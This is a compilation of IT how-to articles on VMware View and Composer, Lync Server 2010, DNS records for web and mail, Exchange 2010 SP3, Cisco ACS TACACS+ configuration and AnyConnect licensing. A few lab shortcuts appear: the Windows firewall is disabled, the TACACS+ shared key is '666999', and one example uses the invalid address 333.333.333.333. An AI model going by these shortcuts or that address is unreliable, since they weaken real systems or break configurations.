VMware View is a big product, deploying it can be daunting, and if you’re not sure what you’re doing it’s pretty easy to deploy ‘misconfigured’, or at the very least not configured as well as it should. I’m going to run though most requirements, but it would seem sensible to break this up into a few different articles.
Solution
Configuring Windows Active Directory for VMware View
1. Before you start, on your domain controller open active directory users and computers (dsa.msc). Create an OU for your View Desktops, also to make administration easier create a separate OU for any linked clones you are going to deploy. In the example below I’ve nested one inside the other to keep my AD neat and tidy.
2. Also whilst in AD users and computers, create some groups, one for ViewUsers, and one for ViewAdministrators. Add in your users to the groups as required.
Note: You can call the groups whatever you like, and have as many different groups as you like.
3. Now connect to your Virtual Center Server, and add the domain ViewAdministrators group to the LOCAL Administrators group on that server.
Installing and configuring VMware View 5
4. Run the installer for VMware Connection Server (there is a x32 and an x64 version, make sure you download the correct one as VMware call the x64 bit version VMware-viewconnectionserver-x86_64-5.0.1-640055.exe, which at first glance looks like a x32 bit file). Accept all the defaults until you see the following screen, and select View Standard Server.
View Standard Server: Select if this is the first Connection Server you are deploying. View Replica Server: Select this if you already have a connection server and you want to copy the configuration from that server, once in operation it just becomes a standard replica server. View Security Server: Usually placed on an edge network or in a DMZ to broker connection requests. View Transfer Server: Only required if your clients are going to use ‘Local Mode’ for their View desktops..
5. Accept all the defaults and finish the installation.
6. Connect to the VMware View administrator console, this is a web connection to https://{Connection-server-name/admin Note: Adobe Flash is required for it to work.
7. The first time you connect it will take you straight to View Configuration > Product Licencing and Usage > Select “Edit Licence” and type/paste in your licence key.
8. To point the connection server to your virtual center server, select View Configuration > Servers > vCenter Server section > Add.
9. Give it the vCenter server name, and a username and password for a user who is a member of your ViewAdministrators group.
Note: If your vCenter server has VMware composer installed this is where you would enable it. At this time I do not, but I will return here later after I’ve installed it when I cover VMware Composer and ‘linked clones’.
Related Articles, References, Credits, or External Links
In Part 3 we ran through manual pools, if you want to deploy automated pools using ‘Linked Clones’, then you will need VMware Composer. Composer installs on your Virtual Center Server. It also requires a database, the following is a step by step guide to installing SQL Server 2008 R2 and configuring it for Composer.
VMware View 5 Suppored Database Platforms
When you have your databse platform installed and configured, on the Virtual center server create an ODBC connection to the database and install VMware Composer. Finally you will need to enable composer in the VMware View Administrator Console.
Solution
VMware View – Installing SQL 2008 R2 and Configuring for Composer
1. Let the SQL DVD auto-run and choose Installation > New installation > OK > Product Key > Next > Accept the EULA > Next > Install the setup files.
2. Take note of any warnings, here it’s complaining that I’m on a domain controller (in a test environment this is OK, don’t do this in production!). And it’s giving me a firewall warning. I’m going to disable the firewall as I’m behind a corporate firewall, BUT if you want to create an exception for TCP port 1433, or run the following command. That would be the correct way to address the warning.
[box] netsh advfirewall firewall add rule name = SQLPort dir = in protocol = tcp action = allow localport = 1433 remoteip = localsubnet profile = DOMAIN [/box]
3. You only need the “Database Engine Services” and the “Management Tools” , or you can simply install everything > Next > Next > Select Default Instance* > Next > Next.
*Unless you specifically want a named instance.
4. I set the services to run under the ‘System’ account, if you want to use the domain admin, or another domain service account use that instead. You can use the “Use same account button for all” to save typing > Next.
5. We will need SQL authentication, type in a suitable complex password (You can add the current user of the domain administrator as well) > Next > If your installing Analysis services you can add an account here > Next.
6. Install the native mode default configuration > Next > Next > Next > Install > Close > Exit the SQL installer.
7. Launch the SQL Management Studio > Log in (for servername simply type in localhost) > Right click Databases > New Database..
8. Give the Database a name > Select the ‘Options’ Settings.
9. Change the recovery model to ‘Simple’ > OK.
10. Expand Security > Logins > Create a new login.
13. Give the new user/login a name, select SQL authentication > Set a complex password > Untick Enforce password expiration > Select the user mappping section (on the left).
14. Select the database you have just created and give this new user the “db_owner” role > OK > Exit the management studio
VMware View – Configure ODBC Settings on the Virtual Center Server
15. On the vCenter Server > Start > Administrative Tools > Data Sources (ODBC).
16. System DSN > Add > SQL Server Native Client > Finish,
17. Add in the Database name and the server you installed SQL on > Next.
18. Supply the details for the user you created and the password you set > Next.
19. Change the default database from ‘master’ to the one you created > Next > accept all the defaults > Finish.
20. Click ‘Test Data Source’ and it should say TEST COMLPETED SUCESSFULLY > OK > OK > OK.
VMware View – Installing VMware Composer
Note: Composer MUST be installed on your VMware virtual Center (vCenter) Server.
21. Run the installer > Next > Next > Accept the EULA > Next > Next > Enter the ODBC details and login you created earlier > Next.
22. Next > Install > Finish.
VMware View – Add Composer to VMware View Administrator Console
23. Connect to, and log into the VMware View Administrator Console > View Configuration > Servers > If you already have a vCenter server select Edit > If not select Add.
24. On the vCenter Server settings tab ensure ‘Enable View Composer’ is ticked and add in a domain user (with rights to create, and delete computer objects in the domain) > OK.
25. You will know if the operation was successful as the vCenter logo will change, it will now have a gold/yellow box around it.
Related Articles, References, Credits, or External Links
Windows Server has a password complexity requirement to make sure passwords are strong. Yes it can be disabled, but while it is in place you need your passwords to confirm to the following.
A few weeks ago my boss asked me to take a look at Microsoft Lync. Because he was interested in the Lync Client (formally Microsoft Communicator) for instant messaging.
Decent info is a bit thin on the net, and I don’t have the patience to read stupidly long PDF files. So to redress the balance I thought I would publish my findings below.
Solution
Note: The following procedure is carried out on Server 2008 R2 with Windows 7 Clients, on my VMware test network.
Walkthrough
I know a lot of people don’t like watching videos so heres my notes:
Pre-Requisites
1. Download and install, Microsoft Silverlight. (link)
2. IIS (Roles > Add Roles > Web Server IIS) > Next.
Also add:
i. ASP.NET
ii. Logging Tools
iii. Tracing
iv. Client Certificate Mapping Authentication.
v. Windows Authentication
vi. IIS Management Scripts and Tools
Next > Install > Finish.
3. RSAT Tools (Features > Add Features > Remote Server Administrative Tools > ADDS and LDS Tools) > Next > Install > Close > Select Yes to Reboot > Post Reboot Installation will continue > Close.
4. Have a Certification authority set up in your domain. OR a certificate ready for the Lync Server to import.
Install
1. Run Setup > It will ask to Install C++ let it do so.
2. Once it’s finished, It will ask for the install location > change if required > Install.
3. Accept the EULA > OK.
4. When the Deployment Wizard starts > Select “Prepare Active Directory”.
5. Prepare Schema > Run > Next > Finish.
6. Allow domain replication.
7. Prepare Current Forest > Run > Select Local Domain > Next > Finish.
8. Allow domain replication.
9. Prepare Domain > Run > Next > Finish.
10. When all are completed, add your administrators to the newly created AD group CSAdministrators > Then click “Back” to return to the main page of the Deployment Wizard.
11. Prepare First Standard Edition Server > Next > SQL Express will install > Finish.
12. Install Topology Builder > It installs very quickly and gets a green tick when complete.
13. Start > All Programs > Microsoft Lync Server 2010 > Lync Server Topology builder > When promoted select > New Topology > OK.
14. Save the topology as requested.
15. Under “Primary SIP Domain” > enter your domain name > Next.
16. Enter any additional domains if required > Next.
11. Give the site a name and description > Next.
12. Enter site details > Next > With the option to “Open the new front end wizard..” selected > Finish.
13. At the “Define a new front end pool” wizard > Next > Enter the FQDN of the server and select Standard Edition > Next.
14. Select features (Everything except PSTN, because I don’t have a PSTN gateway) > Next.
15. Choose to Collocate Mediation Server > Next.
16. Don’t add any further server roles > Next > Next.
17. Let it create a new share > Next.
(Note manually create the share and make sure it has appropriate permissions).
18. Set external URL if required > Next > we are not adding PSTN > Finish.
19. On the Topology Builder Select > Edit Properties > Central Management Server.
20. Add in the admin URL (Note: Make sure this resolves in DNS), and FQDN of the server > OK.
21. Select Publish Topology > Next > Next > Finish.
22. Re-launch or swap back to the Lync Server Deployment Wizard > Select Install or Update Lync Server System.
24. Run step one “Install Local Configuration Store” > Select “Retrieve directly…” > Next > Finish.
25. Run Step two “Setup or Remove Lync Server Components” > Next > (If you get a Prerequisite installation failed: Wmf2008R2 click the link) > Finish.
26. Run Step three “Request, Install, or Assign Certificates” > Request > Next > Send request immediately > Next.
27. Select your CA > Next > Next > Next.
28. Choose a friendly Name > Next.
29. Fill in your Organisation information > Next > Enter country > State and City > Next > Next > Next > Next > Next > Next > Finish. > Close.
30. Run Step 4 “Start Services” > Next > Finish.
31. Check the service status if you wish.
32. Close the deployment wizard.
Launch “Lync Server control Panel” and Configure
1. Launch the ” Lync Server Control Panel” > Log in with an admin account (created above at step 10).
2. Navigate to Users > Add.
3. Add in your users and assign them to your pool.
Post Install Tasks
1. You need to create a DNSSRV (Service Location) so the client can locate the Lync server:
i. service: _sipintenaltls
ii. Protocol: _tcp
iii. Port Number: 5061
iv. Host offering service: the FQDN of the Lync Server.
Install the ‘Lync Client’ on the client machines.
Related Articles, References, Credits, or External Links
Simply purchasing a domain name is not enough to get email flowing in your direction, and people onto your website. you also need your DNS Records to point to your IP address(s) as well.
For those people, that needs either an email or fax (on company headed note paper) to request that these records be set up correctly. You will need to send this request to your ISP (or whoever is hosting your public DNS records).
This runs through what information you should request and why.
Remember if you have a security device on the outside of your network (like a firewall or a router providing firewall services) the correct ports will need to be open to your web server (usually TCP Port 80 and/or 443), or your mail server (TCP Port 25, though Exchange may require 443 for OWA and ActiveSync).
Note: This assumes your ISP has given you either a static public IP address, or a range of public IP addresses. While it is possible to use services like no-ip if you don’t have a static IP address.
To get to http://www.yourwebsite.com people need to be able to translate that address to the IP address of your web server. You do this by sending a “query” to a DNS server, which either checks with other DNS servers, or sends you the IP address directly.
1. You need to purchase your domain name. This may sound obvious but I’ve seen people who own companya.com, simply add company.co.uk to their Exchange server and expect it to work!
2. This website is on my petenetlive.com domain, the people who host my DNS records have a record called an “A Record” (may be called a “host” record depending on your ISP) that points www to the public address of my website, like so;
Note: Above I’ve shown you how the record would look in a Windows DNS server, just so you can get an idea of what these records are that you are requesting. (also they take seconds to create, don’t let your ISP take ages to do this!).
Testing your DNS Host Records
On a windows client you have a command that can test, and show you what your machine sees when it looks for DNS records, this is called nslookup, below you can see I’m issuing a query to see what IP address www.petenetlive.com should be on.
Note: I’m not on this IP address, I’ve just set it up this way for the purpose of demonstration. Drop to command line and issue the above command and you will see my real current IP address.
What do I need to Request from my ISP / Domain Host?
Assuming your domain name is xyz-company.com and you have a public IP address of 234.234.234.234. The following should suffice;
[box]
Ref: Domain name xyz-company.com
Please can you arrange for my www record to point to 234.234.234.234
Signed
{Someone your ISP has on record}
[/box]
Setting up DNS Records for a Email Server (A, MX, PTR and SPF Records)
1. Just as above your mail server(s) will need an “A Record“, I’m going to create two (just to demonstrate mail preferences later on), one for mail.petenetlive.com and the other for mail2.petenetlive.com
2. Now, you need an MX (Mail Exchange) Record that points to the A Record(s) you created earlier, you can set them with preferences.
What are MX Record Preferences
If you have multiple mail servers, or a backup mail system you can create as many MX Records as you like, by default mail will be sent to the LOWEST preference first, if that IP address is offline or unreachable it will try the NEXT HIGHEST preference.
Testing your MX Records
As above I’m going to use the nslookup command, though this time I’ll simply issue nslookup command on its own, then I can change the type of record it searches for to MX, before I issue my query.
Note: Helpfully it also shows you the correct A Records as well.
3. Though not essential to get your mail, you should also have a PTR (Pointer) record(s) set up as well. These work the opposite way round to an A Record. An A Record converts a name into an IP address, a PTR Record converts an IP address back to the name again.
Why Do I Need PTR Records?
With the explosion in the amount of spam being sent, people have sought a system that will cut it down. So some email systems (famously Hotmail) started doing reverse lookups on incoming mail, they lookup the address that is sending them mail (THAT WOULD BE YOU) and if it does not resolve back to the domain name of the email being sent they drop the mail (This is called a Reverse Lookup Failure). So without PTR records you may find you cannot email some domains. If your ISP cannot provide PTR records you may need to ask if you can route your mail through your ISP’s “Smart Host”.
Testing your PTR Records
As above, I’m going to use the nslookup command, though this time I’ll simply issue nslookup command on its own, then I can change the type of record it searches for PTR records, before I issue my query.
4. The last type of record you MAY need is an SPF (Sender Policy Framework) Record. They are designed so you can list your mail servers and domains in a special record (either a text record or a DNS option 99 record). They are designed to cut down spam, but to be honest YOU ONLY NEED ONE IF you have some external entity that sends mail that comes from your email addresses (i.e. your web hosted CRM system).
How do I create an SPF Record?
An SPF Record is just some text (see above), the simplest way to work out what you need in yours, is to use this wizard.
Testing your PTR Records
As above, I’m going to use the nslookup command, though this time I’ll simply issue nslookup command on its own, then I can change the type of record it searches for TXT records, before I issue my query.
What do I need to Request from my ISP / Domain Host?
Assuming your domain name is xyz-company.com and you have a public IP address of 234.234.234.234. The following should suffice;
[box]
Ref: Domain name xyz-company.com
Please can you arrange for the following records to be created;.
A/Host Record for mail.xyz-company.com to point to 234.234.234.234
MX Record (Preference 10) that points to mail.xyz-company.com
PTR Record that points 234.234.234.234 to mail.xyz-company.com
Signed
{Someone your ISP has on record}
[/box]
Assuming your domain name is xyz-company.com and you have a public IP address of 234.234.234.234, and a backup mail server at your secondary site that has an IP address off 333.333.333.333. The following should suffice;
[box]
Ref: Domain name xyz-company.com
Please can you arrange for the following records to be created;.
A/Host Record for mail.xyz-company.com to point to 234.234.234.234
A/Host Record for mail2.xyz-company.com to point to 333.333.333.333
MX Record (Preference 10) that points to mail.xyz-company.com
MX Record (Preference 20) that points to mail2.xyz-company.com
PTR Record that points 234.234.234.234 to mail.xyz-company.com
PTR Record that points 333.333.333.333 to mail2.xyz-company.com
Signed
{Someone your ISP has on record}
[/box]
Related Articles, References, Credits, or External Links
At the time of writing (14/02/13), the answer is NO, for full coexistence with Exchange 2013 you need to have Exchange 2013 CU1 (Cumulative Update), which at this time is unreleased (Expected Q1 of 2013 – so we are not far away).
Note: CU2 is now released.
Solution
So What do I get with Exchange 2010 SP3?
1. You can install Exchange 2010 on Windows Server 2012, (though you can’t in-place upgrade the OS of an existing Windows 2008 R2 server to 2012).
2. Full support for Internet Explorer 10.
3. All fixes from previous update roll-ups, (including MS13-012).
You will need to perform an AD schema update to install SP3.
Related Articles, References, Credits, or External Links
For network identification I have tended to use RADIUS (in a Windows NPS or IAS flavour), in the past. I turned my back on Cisco TACACS+ back in my ‘Studying for CCNA’ days, because back then it was clunky and awful. I have a client that will be installing ACS in the near future, so I thought I would take a look at it again, and was surprised at how much more polished it is. As Cisco plans to roll ACS into Cisco ISE in the future, I’m not sure if it will remain as a separate product. So we may find people using version 5 for a long time yet.
Solution
I’m deploying ACS version 5.5 as a virtual appliance, remember to give it at least 60GB of hard drive or the install will fail. If you are installing on VMware workstation, choose the ‘I will install the operating system later’ option and manually present the CD image or it will also fail.
When you have run through the initial setup on the appliance it will set;
1. Join the ACS appliance to your domain. Users and Identity Stores > External Identity Stores > Active Directory > Join/Test Connection > Enter Domain Credentials > Join.
2. Be patient it can take a couple of minutes, wait till it says ‘Joined and Connected’.
3. Make sure you already have some groups in active directory that you want to grant access to, here I’ve got a full-access group and a read-only access group.
Note: I’m going to grant privilege level 15 to full-access, and privilege level 1 to read-only, (yes I know they can still escalate to configure terminal mode, but you can always restrict level 1 so it can only use the show command if you like).
4. Back in ACS > Directory Groups > Add > Add in your Groups > OK.
5. Create a Shell Policy: Policy Elements > Authorization and Permissions > Shell Profiles > Create > First create one for level 15 (full-access).
12. Add > Shell Profile > Select > Select the full-access profile > OK.
13. Repeat for the read-only group.
14. Set the shell profile to read-only access > OK.
15. Access Policies > Service Selection Rules > Create > Set to Match Protocol TACACS > Set the service to Default Device Admin > OK.
16. Network Resources > Network Devices and AAA Clients > Enter the details of your Cisco device and set a shared key, (here I’m using 666999) > Submit.
17. Make the necessary changes on your Cisco devices, like so;
Cisco IOS TACACS+ Config
[box]
Petes-Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Petes-Router(config)#aaa new-model
Petes-Router(config)#aaa authentication login default group tacacs+ local
Petes-Router(config)#aaa authorization exec default group tacacs+ local
Petes-Router(config)#aaa authorization console
Petes-Router(config)#tacacs-server host 10.254.254.22
Petes-Router(config)#tacacs-server key 666999
Petes-Router(config)#end
Petes-Router#
*Mar 1 00:10:24.691: %SYS-5-CONFIG_I: Configured from console by console
Petes-Router#write mem
Building configuration...
[OK]
Petes-Router#
[/box]
Cisco ASA 5500 (and Next Generation) TACACS+ Config
[box]
Petes-ASA# configure terminal
Petes-ASA(config)# aaa-server PNL-AAA-TACACS protocol tacacs+
Petes-ASA(config-aaa-server-group)# aaa-server PNL-AAA-TACACS (inside) host 10.254.254.22
Petes-ASA(config-aaa-server-host)# key 666999
Petes-ASA(config-aaa-server-host)# exit
Petes-ASA(config)#
-=-=-=-=-Authentication-=-=-=-=-ASDM Authentication
Petes-ASA(config)# aaa authentication http console PNL-AAA-TACACS LOCAL Console Authentication
Petes-ASA(config)# aaa authentication serial console PNL-AAA-TACACS LOCALSSH Authentication
Petes-ASA(config)# aaa authentication ssh console PNL-AAA-TACACS LOCALTelnet Authentication
Petes-ASA(config)# aaa authentication telnet console PNL-AAA-TACACS LOCAL
Enable Mode Command Protection Authentication
Petes-ASA(config)# aaa authentication enable console PNL-AAA-TACACS LOCAL-=-=-=-=-Authorisation-=-=-=-=-
Petes-ASA(config)# aaa authorization command PNL-AAA-TACACS LOCAL
Petes-ASA(config)# privilege show level 5 mode configure configure command aaa
<repeat as necessary - Note: Turn it on with the ASDM with command preview enables and you can copy paste all the commands out and edit them accordingly>-=-=-=-=-Accounting-=-=-=-=-
Petes-ASA(config)# aaa accounting command PNL-AAA-TACACS
[/box]
18. Now you can test, here I connect as a user with read-only access (Note: I have a greater than prompt, I’m in user EXEC mode). Then when I connect as a full-access user (Note: I have a hash prompt. I’m in privileged EXEC mode).
19. The results are the same if I connect via SSH.
Enabling TACACS+ Though a Firewall
Sometimes, e.g. you have a switch in a DMZ or a router outside your firewall that you want to secure with TACACS. To enable this you simply need to open TCP port 49, from the device you are securing with TACACS to the ACS server.
Related Articles, References, Credits, or External Links
When Cisco released the 8.2 version of the ASA code, they changed their licensing model for AnyConnect Licenses. There are two licensing models, Premium and Essentials.
Solution
Cisco ASA AnyConnect Premium Licenses.
You get two of these free with your firewall*, with a ‘Premium License’ you can use the AnyConnect client software for remote VPN Access, and you can access Clientless SSL facilities via the web portal.
*As pointed out by @nhomsany “The two default premium licenses available are NOT cross-platform, (i.e. only Mac or Windows).
Additionally you can use this license’ model with the Advanced Endpoint Assessment License’, this is the license’ you require for Cisco Secure Desktop. You can also use this license’ with the AnyConnect Mobile license’ for access from mobile devices like phones or tablets, (both these licenses are an additional purchase).
For most people wishing to buy extra AnyConnect licensing, this will be the one you want. Their type and size differ depending on the ASA platform in question, e.g. the 5505 premium licenses. are available as 10 session and 25 session licenses. the 5510 are in 10, 25, 50, 100 and 250 Sessions. (Note: These are correct for version 8.4 and are subject to change, check with your re seller).
Failover: If you are using failover firewalls you can (but don’t have to) use a shared license’ model, this lets you purchase a bundle of Premium licenses. and share them across multiple pieces of hardware, This requires an ASA to be setup as the license’ server’. Before version 8.3 you needed to purchase licenses for both firewalls. After version 8.3, Cisco allowed the licenses. to be replicated between firewalls in a failover pair. The exception is Active/Active where the amount of licenses. is aggregated together from both firewalls and ALL are available providing the figure does not exceed the maximum for the hardware being used.
Cisco ASA AnyConnect Essential Licenses
When you enable ‘Essential Licensing’, your firewall changes it’s licensing model and the two Premium licenses. you get with it are disabled*. The Firewall will then ONLY accept AnyConnect connections from the AnyConnect VPN client software.
Note: The portal still exists, but can only be used to download the AnyConnect Client Software.
With Essentials licensing enabled, the firewall will then accept the maximum VPN sessions it can support for that hardware version (see here), without the need to keep adding licenses.
Note: Remember these are “Peer VPN Sessions”. If you have a bunch of other VPN’s (including IPSEC ones), then these are taken from the ‘pot’.
Additionally, you can also use this license’ with the AnyConnect Mobile license’ for access from mobile devices like phones or tablets, this license’ is an additional purchase.
Failover: Prior to version 8.3, if you have failover firewalls and are using Essentials licenses you need to purchase an Essentials license’ for BOTH firewalls. After version 8.3 Cisco allowed the licenses. to be replicated between firewalls in a failover pair.
*To re-enable the built in Premium Licenses. you need to disable Essentials licensing by using the ‘no anyconnect-essentials” command or in the ASDM> Configuration > Remote Access VPN > Network (Client) Access > Advanced > AnyConnect Essentials.
Related Articles, References, Credits, or External Links